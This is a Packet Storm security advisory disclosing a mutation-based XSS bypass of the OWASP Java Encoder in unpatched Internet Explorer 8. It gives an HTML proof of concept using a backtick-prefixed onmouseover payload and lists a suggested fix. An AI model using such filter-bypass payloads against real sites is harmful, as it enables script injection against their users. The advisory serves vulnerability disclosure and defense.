exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OWASP Java Encoder Filter Bypass

OWASP Java Encoder Filter Bypass
Posted Nov 6, 2013
Authored by Rafay Baloch, Alex Infuhr

OWASP Java Encoder suffers from a cross site scripting bypass vulnerability when it comes to the use of backticks.

tags | exploit, java, xss, bypass
SHA-256 | e201eb39628f1a3e446bebe36150d242b93041dab9381b0f61668518f32cf0d3

OWASP Java Encoder Filter Bypass

Change Mirror Download
*#Product: OWASP Java Encoder*
*#Vulnerability: Mutation Based XSS Bypass *
*#Impact: Medium/Limited*
*#Authors: Rafay Baloch And Alex Infuhr*
*#Company: RHAinfoSEC *
*#Website: http://services.rafayhackingarticles.net
<http://services.rafayhackingarticles.net>*
*#Status: To be fixed in the next release*

*=========*
*Description*
*=========*

Owasp encoder is an encoding library, that attempts to protect the website
users by encoding any un-trusted input before it's reflected back.

*=========*
*Vulnerability*
*==========*

The issue occurs inside of internet explorer only because treats accent
grave ` as a delimiter character, and we can escape out of a valid
attribute inside of an un-patched IE 8, since it does not put double quotes
around our vector when it's returned via innerHTML property.

*=============*
*Proof of concept*
*=============*

Here is the POC that came by slightly modifying the following example at
html5sec.org#59.

The POC was tested in Internet explorer version 8:
<html>
<head>
</head>
<div id="a"><input value="``onmouseover=alert(1)"></div>
<div id="b"></div>
<script>b.innerHTML=a.innerHTML</script>
</html>

*Attacker's Input:*

``onmouseover=alert(1)

*Vulnerable Browsers Output:*

<div id="a"><input value=``onmouseover=alert(1)></div>

*Patched Browsers Output:*

<div id="a"><input value="``onmouseover=alert(1)"></div>

When the above POC is tested inside of an unpatched Internet explorer 8, it
was noticed that IE 8 does not places quotes around it when it's rendered
by innerHTML property. However, When placed in a patched version of
internet explorer, it places double quotes around when the string is
returned back to the user, hence stopping the attack.

*===*
*Fix*
*===*

Currently, I am not aware of any other solutions then stripping out the
accent grave character, encoding doesn't seems to solve the problem here.

*==========*
*References*
*==========*

http://html5sec.org/#59
http://www.slideshare.net/x00mario/the-innerhtml-apocalypse
https://cure53.de/fp170.pdf
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close